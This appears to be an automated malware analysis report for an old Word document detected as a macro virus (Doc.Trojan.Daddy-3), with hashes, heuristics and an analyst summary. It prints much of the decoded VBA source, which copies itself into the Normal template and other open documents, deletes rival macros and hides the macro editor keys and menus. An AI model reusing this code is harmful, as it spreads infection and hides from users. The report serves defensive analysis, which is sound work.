Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 63a177b650d93811…

MALICIOUS

Office (OLE)

240.0 KB Created: 1997-04-26 16:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 7203ddd5e2e13abff19e32bec32d0236 SHA-1: aceeb6e92b2468a4a6b28cfe2d8f891bb610a47e SHA-256: 63a177b650d938112aabe6b3226bcfe032adfaaaf677dc053f79484aa5b50e4b
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits characteristics of legacy macro viruses, including WordBasic markers and the presence of VBA macros within the AutoOpen and Auto_Close functions. The script attempts to modify the Normal template and customizes command bars, indicating an intent to establish persistence or facilitate further malicious actions. The ClamAV detections further support its malicious nature.

Heuristics 5

  • ClamAV: Doc.Trojan.Daddy-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Daddy-3
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12875 bytes
SHA-256: 611a065a994ece75d6a4ab798a5c88269c3349dd6dd19f071b098c2f0cbce58e
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "a"
Public DokumenAktif As Object, mTujuan As Variant
Public nBackup As Boolean, mAda As Boolean, Musnahkan As Boolean, Reset As Boolean, fKeluar As Boolean, dHitung As Boolean
Function Utama()
On Error Resume Next
   CommandBars("Tools").Controls("Macro").Delete
   CustomizationContext = NormalTemplate
   FindKey(BuildKeyCode(wdF11, wdKeyAlt)).Disable
   FindKey(BuildKeyCode(wdF8, wdKeyAlt)).Disable
On Error GoTo 0
Dim mNama(2) As String
Dim tNorm As Object
Dim mSumber$
On Error GoTo Beres
mNama(0) = "a"
mNama(1) = "a1"
mNama(2) = "a2"
mSumber = MacroContainer
Set tNorm = NormalTemplate
If Not dHitung Then
Set DokumenAktif = ActiveDocument
ElseIf mSumber <> "WIN32S16.DOT" Then
mSumber = tNorm
End If
If mSumber = tNorm Then
mSumber = tNorm.FullName: Set mTujuan = DokumenAktif
ElseIf mSumber = DokumenAktif Then
mSumber = DokumenAktif.FullName: Set mTujuan = tNorm
ElseIf mSumber = "WIN32S16.DOT" Then
Set mTujuan = tNorm
mSumber = Options.DefaultFilePath(8) & "\WIN32S16.DLL"
End If
mMusnahkan mTujuan
With mTujuan.VBProject
If Not (Not Musnahkan And .Description = "a" And .VBComponents.Count > 2) Then
    mGandakan mSumber, mTujuan, mNama
    Musnahkan = False
    .Description = "a"
    If mTujuan = tNorm Then
        Options.SaveInterval = 1
        CustomizationContext = tNorm
        CommandBars("Tools").Reset
        KeyBindings.Add KeyCode:=BuildKeyCode(77, 1024), KeyCategory:=1, _
        Command:="ToolsRecordMacroStart"
        mTujuan.Save
    End If
    CommandBars("Macro").Controls(2).OnAction = "ViewVbCode"
Else
GoTo Siaga
End If
End With
If mAda = True Then Exit Function
SiapUlangkan
On Error Resume Next
Siaga:
If fKeluar = True Then Exit Function
Exit Function
Beres:
End Function
Sub mMusnahkan(fSmbr)
On Error Resume Next
Dim mNama As Object
For Each mNama In fSmbr.VBProject.VBComponents
    If mNama.Name = "NewMacros" Then nBackup = True
    If mNama.Name <> "ThisDocument" And mNama.Name <> "NewMacros" _
    And mNama.Name <> "a" And mNama.Name <> "a1" _
    And mNama.Name <> "a2" Then
        Musnahkan = True
        If Reset Then
        Application.OrganizerDelete fSmbr.FullName, mNama.Name, 3
        Else
        mNama.CodeModule.DeleteLines 1, mNama.CodeModule.CountOfLines
        End If
    End If
Next mNama
End Sub
Sub mGandakan(fSmbr, fTjn, mNama)
On Error Resume Next
Dim aNmak
For Each aNmak In mNama
Application.OrganizerCopy fSmbr, fTjn.FullName, aNmak, 3
Next
End Sub
Sub Iklan()
On Error Resume Next
a2.Show
Application.OnTime When:=Now + TimeValue("00:15:00"), Name:="a.Iklan"
End Sub
Sub FileOpen()
On Error Resume Next
wTmp
If Dialogs(80).Show <> 0 Then
wFle
AutoOpen
Else
wFle
End If
End Sub
Sub AutoOpen()
On Error Resume Next
   If Month(Now) = 10 Then GoTo CekTanggal1
   If Month(Now) = 5 Then GoTo CekTanggal2
   GoTo Selesai
CekTanggal1:
   If Day(Now) = 7 Then MsgBox "'Met ulang tahun DaNnY DeSPiRo !", vbInformation, "[ despiro@hotmail.com ]"
   GoTo Selesai
CekTanggal2:
   If Day(Now) = 19 Then MsgBox "'Met ulang tahun YeNi CeLuS !", vbInformation, "[ despiro@hotmail.com ]"
   If Day(Now) = 14 Then MsgBox "Hari jadi DAY.forever !", vbInformation, "[ despiro@hotmail.com ]"
Selesai:
Application.EnableCancelKey = wdCancelDisabled
Utama
If Documents.Count > 1 Then
    For i = 1 To Documents.Count
    If Documents(i).Name <> ActiveDocument.Name Then
    Set DokumenAktif = Documents(i)
    dHitung = True
    Musnahkan = False
    Utama
    End If
    Next
End If
If Now > DateSerial(1999, 5, 14) Then Application.OnTime When:=Now + TimeValue("00:15:00"), Name:="a.Iklan"
End Sub
Sub ViewVBCode()
End Sub
Sub AutoExec()
On Error Resume Next
If MacroContainer <> NormalTemplate Then
fKeluar = True
Utama
wTmp
AddIns.
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.